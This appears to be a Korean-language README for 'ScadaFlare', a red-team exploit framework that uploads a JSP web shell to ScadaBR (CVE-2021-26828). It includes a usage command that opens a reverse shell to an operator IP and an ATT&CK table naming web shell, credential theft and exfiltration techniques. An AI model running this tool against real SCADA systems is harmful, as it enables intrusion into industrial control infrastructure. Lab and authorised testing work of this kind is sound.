
ScadaFlare 인증된 RCE 익스플로잇 프레임워크 for ScadaBR (CVE-2021-26828) OpenPLC ScadaBR
ScadaBR <1.1.0을 대상으로 하는 모듈식 인증 후 RCE 익스플로잇으로, 레드팀 작업을 위해 강화되었습니다.

.jsp 셸을 view_edit.shtm을 통해 업로드합니다.이 익스플로잇은 HTB Pro Lab: Alchemy 시나리오 분석 중에 개발되었습니다. Fellipe Oliveira의 원본 PoC는 견고했지만, 다음과 같은 단점이 있었습니다:
Python 2로 작성됨
프록시 지원, 셸 정리, 열거 체인과 같은 현대적인 기능 부족
확장하거나 레드팀 워크플로우에 통합하기 어려움
이 버전인 ScadaFlare는 모듈 지원, 여러 우회 전략, OS 탐지 재정의, 웹훅 통합, SOCKS 프록시 지원, 실제 운영자 사용을 위한 열거 체인을 갖춘 Python 3 전체 재작성입니다.
python3 scadaflare.py http://172.16.0.20:80 admin admin \
--reverse-ip 10.10.14.44 --reverse-port 4445 \
--verbose --cleanup
ScadaFlare는 오직 다음 용도로만 설계되었습니다:
실제 산업 시스템에 대한 무단 사용은 다음을 초래할 수 있습니다:
이 도구를 사용함으로써 귀하는 다음에 대한 전적인 책임을 수락합니다:
MIT 라이선스 – LICENSE 참조
| 단계 | 기술 | ID |
|---|
| 초기 접근 (인증 후) | 유효한 계정 | T1078 |
| 실행 | 공개 애플리케이션 익스플로잇 | T1190 |
| 명령 실행 | 웹 셸 | T1505.003 |
| 권한 작업 | 웹 콘텐츠 수정 | T1505 |
| 자격 증명 접근 | 구성 파일 내 자격 증명 | T1552.001 |
| 탐색 | 원격 시스템 탐색 | T1018 |
| 유출 | 웹 서비스를 통한 유출 | T1567.002 |
| 방어 회피 | 프록시 및 프로토콜 터널링 | T1090 |